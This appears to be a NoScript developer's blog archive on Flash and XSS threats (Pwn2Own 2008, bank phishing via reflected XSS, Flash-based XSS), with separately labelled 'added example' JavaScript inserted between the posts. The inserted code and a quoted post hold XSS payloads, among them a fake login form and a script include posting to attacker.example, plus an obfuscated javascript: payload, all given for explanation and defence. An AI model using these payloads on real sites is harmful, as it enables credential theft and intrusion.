Archive for the Flash Category
1 April 2008
Posted by: Giorgio in Flash, Java, Security, NoScript
CanSecWest's Pwn2Own 2008 contest got heavy coverage over the past few days, so I will recap rules and results very quickly.
Three targets, all fully patched, all in typical client configurations with typical user settings. You hack it, you get to keep it.
Targets (typical road-warrior clients):
- VAIO VGN-TZ37CN running Ubuntu 7.10
- Fujitsu U810 running Vista Ultimate SP1
- MacBook Air running OSX 10.5.2
The competition started on March 26th and was meant to last three days, with the difficulty decreasing each day:
- Day 1, bare OS, no extra applications: no laptop got hacked
- Day 2, applications bundled with the OS (e.g. the web browser): Mac OS X got pwned through a Safari vulnerability
- Day 3, popular 3rd-party applications: Vista fell because of a Flash vulnerability, reportedly exploited through a Java vector
Needless to say, after day 2 the headlines were slight variations on the “Mac OS X Hacked First” theme, while on the last day the song changed into “Vista Breached, Linux Unbeaten”, casting the event as a security contest among OSes.
While I'm very happy to see free (as in beer and as in speech) software being depicted by the media coverage as the best choice (security-wise) over two commercial alternatives, I think that Nathan McFeters, even as biased toward Microsoft as he sounds recently, offers a rather objective report:
- None of the 3 OSes could be violated 1st day, when pure OS security was tested
- Mac OS X was taken because the high-level software it bundles (especially its web browser and multimedia plugins) is not as safe as its FreeBSD-derived core
- Vista was hacked because, notwithstanding all its security enhancements, ubiquitous 3rd party software can work around them and make a relatively safe OS exploitable
Now some simple considerations:
- Safari is a web browser
- Flash and Java are browser-hosted technologies, and they're both cross-platform: in fact, according to Shane Macaulay, who won the Vista laptop, the vulnerabilities he found “could affect Linux or Mac OS X” too
- The browser appears to be the weakest spot in PC security, no matter the OS, while it’s probably the single most used application
Corollary: whatever OS you prefer, never browse the web without NoScript :)
2 Comments »
22 January 2008
Posted by: Giorgio in Flash, NoScript
A NoScript user nicknamed hewee just wrote on the forum:
A couple weeks back I was on a site that had so much going on and that flash box was so small that I right clicked on the placeholder and clicked “Open Link in New Window”. This has worked on almost all flash games and the best part is the game window size is bigger or full screen so you can see things so much better.
When, some months ago, I changed the behavior of plugin content placeholders to be more link-like, the main intentions were allowing other tools like FlashGot to transparently process the blocked content URL as a part of the document, and letting users right-click and choose “Save Link As…”.
Looks like I missed the most obvious and funny side-effect: click this link, middle-click the Flash placeholder, left-click the placeholder filling the new tab… et voilà, full window game!
Users discovering unintended but nice uses for your creature is always exciting, in the true spirit of hacking :)
Thank you hewee!
7 Comments »
12 January 2008
Posted by: Giorgio in XSS, Flash, Security, NoScript
The future of malware doesn’t belong to our hard disks.
While we’re still trying to harden our PCs against malicious executables by using unprivileged accounts, wrapping our browsers inside sandboxes and trusting antivirus programs, our digital assets are quickly moving to another place: how much of our identity and money is already on the Web? Even better, how much of our identity and money is not available somewhere on the Web yet?
Since most malware is after our identity, our money or both, why shouldn’t it follow the same path?
And if today's malware mostly runs on Windows because it's the commonest executable platform, tomorrow's will likely run on the Web, for the very same reason. Because, like it or not, the Web is already a huge executable platform, and we should start thinking of it this way from a security perspective.
I know my words may sound overly speculative, even plain FUD, but real scams and very scary proofs of concept are already here, mocking the “old school” belief that only local execution and privilege escalation are severe threats:
- Real scam — The ultimate bank phishing using XSS.
The credential harvesting form has been embedded inside the real bank page, served through a “secure” HTTPS connection with a valid SSL certificate, by exploiting a reflected XSS vulnerability. Absolutely nothing new, and a relatively poorly performed trick too: the attackers could just as easily have chosen to host the whole payload inside their XSS vector itself, making their fraud even stealthier by avoiding the inclusion of an external resource from a different domain. But since they didn't, they evidently judged their approach good enough to work — and it is, much more than any other phishing attempt you've seen so far, because this is the real bank site!!!
- Scary Proof of Concept — Malicious web page hijacking your router.
You may think you’ve already heard this one: “Just change the default password, it’s basic common sense” you say.
But this time it's different: the GNUCITIZEN guys show us how to compromise your router's DNS settings from the web with no need to log in, by exploiting its “cool” UPnP features through XMLHttpRequest (if an XSS vulnerability is available, as it is in many devices) or Flash (if no XSS is found). And once an attacker owns your router's DNS, he controls your whole LAN, not just your own traffic…
Does anybody still believe browsing the Web with Flash and JavaScript promiscuously enabled and no XSS protection is a good idea?
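The bank case above is a textbook reflected XSS. The following is an added example, not code from the post or from any real bank site: a minimal server-side page template for a hypothetical bank's search page, first with the flaw and then with the fix, plus the two payload styles the post contrasts (a remote script inclusion from a different domain, and a login form carried entirely inside the XSS vector). The parameter name `q`, the page layout and the host names `bank.example` / `attacker.example` are assumptions.

```javascript
// Added example (not the post's or any bank's code). Hypothetical hosts and
// parameter name: bank.example, attacker.example, "q".

// Encode the five characters that can break out of an HTML text or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the untrusted "q" parameter is interpolated verbatim into the page.
function renderSearchVulnerable(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Hardened: the same page, with the parameter HTML-encoded before insertion.
function renderSearchSafe(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Payload style (a): remote inclusion of a resource from a different domain.
const PAYLOAD_REMOTE = '<script src="https://attacker.example/harvest.js"></script>';

// Payload style (b): the whole payload inside the vector itself, no third-party
// fetch at all, here a fake re-login form posting to the attacker's host.
const PAYLOAD_INLINE =
  '<form action="https://attacker.example/collect" method="post">' +
  "Session expired, please log in again:<br>" +
  '<input name="user"><input name="pass" type="password">' +
  '<input type="submit" value="Login"></form>';

// The link the victim receives: the payload travels inside the bank's own URL.
function phishingLink(payload) {
  return "https://bank.example/search?q=" + encodeURIComponent(payload);
}

// Simulates the bank server: read "q" from the request URL and render the page
// with the given template. With the vulnerable template the attacker's markup
// is reflected into a page served by the real site, over the real certificate.
function serveRequest(requestUrl, render) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return render(q);
}

// Does the rendered page contain live (unencoded) form or script markup?
function hasLiveInjection(html) {
  return /<(form|script)\b/i.test(html);
}
```

Both templates receive exactly the same `q`; the only difference is the encoding step, which is why output encoding at the point of insertion (not input filtering) is the fix for reflected XSS.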
6 Comments »
6 January 2008
Posted by: Giorgio in XSS, Flash, Security, NoScript
Rich Cannings recently documented Flash-based XSS, clarifying with concrete examples an issue that had received rather fuzzy coverage so far.
Its “The Fix / Users” section says:
Update to the latest version of Flash Player plugin. This will protect users from attacks using the “asfunction” protocol handler
Unfortunately, the majority of the examples listed right there do not use the “asfunction” protocol handler at all!
More realistically, Jeremiah Grossman writes:
- Users update their Flash player – Based on the nature of the issue, I’m not certain of how much benefit to this there is, but might as well patch anyway if there is one available.
- Disable or block Flash content – I think most people reading this probably already do some form of Flash blocking, but for everyone else, they are simply not going to.
Now, the “some form of Flash blocking” Jeremiah’s talking about is most likely NoScript, which:
- Blocks Flash (and other plugins) by default when the content comes from an untrusted web site
- Blocks Flash (and other plugins) by default when content from a trusted website is embedded in an untrusted page - this prevents embedded Flash XSS
- Checks cross-site requests for script injection and sanitizes them as needed - this prevents reflected XSS, including the Flash variants
The best thing, making this approach much more viable than “disabling Flash content” tout-court, is that you can allow individual blocked content pieces with a click, having a chance to examine their types and full addresses before running them: this is what may save you from being owned in a Flash ;)
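Most of the Flash-based XSS cases Cannings lists come down to the same sink: a URL taken from FlashVars or the query string (the ubiquitous `clickTAG` is the classic) is passed unchecked to a navigation call, so an attacker supplies `javascript:` or `asfunction:` in place of a landing page. The following is an added example, not code from Cannings' paper or from NoScript: the check a Flash author (or a proxy in front of the movie) should apply to such a parameter before navigating. It is written in JavaScript for illustration; the allowlist of schemes, the decision to require an absolute http(s) URL, and the function names are this example's assumptions. Numeric HTML entities are decoded first because the same value may also be inserted into an HTML context, where `java&#x73;cript:` is a working scheme (the hi5 payload quoted further down this page relies on exactly that).

```javascript
// Added example (not from Cannings' paper or NoScript). The allowlist, the
// absolute-URL requirement and the helper names are assumptions.

// Decode numeric HTML entities (&#x73; / &#115;), the usual way to hide the
// "javascript:" scheme from naive substring filters.
function decodeNumericEntities(s) {
  return String(s).replace(/&#(x[0-9a-f]+|\d+);/gi, (_, code) => {
    const n = code[0].toLowerCase() === "x" ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return n <= 0x10ffff ? String.fromCodePoint(n) : "";
  });
}

// Browsers ignore ASCII control characters and whitespace inside a scheme
// ("java\tscript:"), so strip them before looking at it. The normalized form
// is the one that must be navigated to if the check passes, never the raw one.
function normalizeUrl(raw) {
  return decodeNumericEntities(raw).replace(/[\u0000-\u0020]/g, "");
}

const ALLOWED_SCHEMES = new Set(["http", "https"]);
// Schemes that hand the plugin control of the embedding page's scripting context:
// asfunction is Flash-specific, the others are browser pseudo-schemes.
const DANGEROUS_SCHEMES = new Set(["javascript", "asfunction", "vbscript", "data"]);

// Returns { ok, url, scheme, reason }. url is the normalized string to navigate to
// (null when rejected); scheme is what was parsed (null for schemeless input).
function checkNavigationUrl(raw) {
  const url = normalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) {
    return { ok: false, url: null, scheme: null, reason: "relative or schemeless URL; an absolute http(s) URL is required" };
  }
  const scheme = m[1].toLowerCase();
  if (DANGEROUS_SCHEMES.has(scheme)) {
    return { ok: false, url: null, scheme, reason: "script-executing scheme" };
  }
  if (!ALLOWED_SCHEMES.has(scheme)) {
    return { ok: false, url: null, scheme, reason: "scheme not in allowlist" };
  }
  return { ok: true, url, scheme, reason: "" };
}
```

The point of the allowlist (rather than a blocklist alone) is that the dangerous set is never complete; `DANGEROUS_SCHEMES` exists only to give a more useful reason in logs.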
5 Comments »
25 December 2007
Posted by: Giorgio in XSS, Flash, Security, NoScript
Looks like 2007 improved XSS awareness in the “mainstream” media outlets too.
The Register recently published a report about the Orkut XSS worm. It's not the first time (here's a list of XSS worms, and some had already hit The Register's columns), but the level of understanding is visibly getting better. This is clearly good, because XSS worms are becoming more and more common. While at this moment we mainly see prankish demonstrations, like this nice hi5.com Xmas gift by my friend Sirdarckcat, we should all be worried by how quick and easy this kind of web application flaw is to find and exploit, and be ready for the real scams that are unavoidably coming (like this), thanks to the growing importance of so-called “Web 2.0 social networks” and other web services in our private and business lives.
The Register has also “discovered” Flash-based XSS, something that is surely old news in our circles: as you may remember, Sirdarckcat's attack on RSnake was based on that.
The good news is that you, dear NoScript user, are already immune to both the aforementioned XSS worms, which are based on cross-site XBL (something which is also mitigated by Firefox 3) and, more generally, on 3rd-party script inclusion.
Even better, you're also protected against Flash-based XSS, including the kind used against RSnake, now in NoScript's default configuration: the latest NoScript, in fact, won't run Flash applets (and other plugins), even if hosted on trusted sites, when they're embedded or linked from an untrusted site. In other words, it prevents browser plugins from being exploited for XSS in the very definition of the term: cross-site.
java&#x73;cript:\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0048\u0061\u0070\u0070\u0079 " + 0x07D8)
(The payload above is a javascript: URL with the scheme hidden behind a numeric HTML entity and the call spelled out in Unicode escapes; it decodes to alert("Happy " + 0x07D8), i.e. “Happy 2008”.)
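The rule stated in the two NoScript-related posts above (plugin content runs only if it comes from a trusted site and the page embedding or linking it is trusted too) is small enough to show as code. The following is an added example, not NoScript's code: a policy function that applies that rule, with NoScript-style site matching where an allowlisted domain also covers its subdomains. The allowlist contents, the host names and the function names are this example's assumptions.

```javascript
// Added example (not NoScript's code). Sample allowlist and host names are assumptions.

// Reduce a URL to the host name, which is what the allowlist reasons about.
// Returns null for URLs without a host (data:, about:, javascript: ...).
function siteOf(url) {
  try {
    const host = new URL(url).hostname.toLowerCase();
    return host || null;
  } catch (e) {
    return null;
  }
}

// A host is trusted if it, or one of its parent domains, is on the allowlist:
// "trusted.example" covers "www.trusted.example" and "cdn.trusted.example",
// but a bare top-level label ("example") is never matched on its own.
function isTrustedHost(host, allowlist) {
  if (!host) return false;
  const labels = host.split(".");
  if (labels.length === 1) return allowlist.has(host);
  for (let i = 0; i < labels.length - 1; i++) {
    if (allowlist.has(labels.slice(i).join("."))) return true;
  }
  return false;
}

// Decide whether plugin content embedded in (or linked from) a page may run.
// Both the content and the embedding document must come from trusted sites.
// Blocking trusted Flash embedded by an untrusted page is what stops a
// vulnerable movie on a site you trust from being used as a cross-site vector.
function shouldRunPlugin(pageUrl, contentUrl, allowlist) {
  const contentSite = siteOf(contentUrl);
  const pageSite = siteOf(pageUrl);
  if (!isTrustedHost(contentSite, allowlist)) {
    return { run: false, reason: "plugin content from untrusted site" };
  }
  if (!isTrustedHost(pageSite, allowlist)) {
    return { run: false, reason: "trusted content embedded by untrusted page" };
  }
  return { run: true, reason: "" };
}

// Constructed sample allowlist.
const SAMPLE_ALLOWLIST = new Set(["trusted.example", "bank.example"]);
```

The second check is the one that matters for Flash-based XSS: the vulnerable movie lives on the trusted site, so a content-only check would let it run wherever an attacker embeds it.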
5 Comments »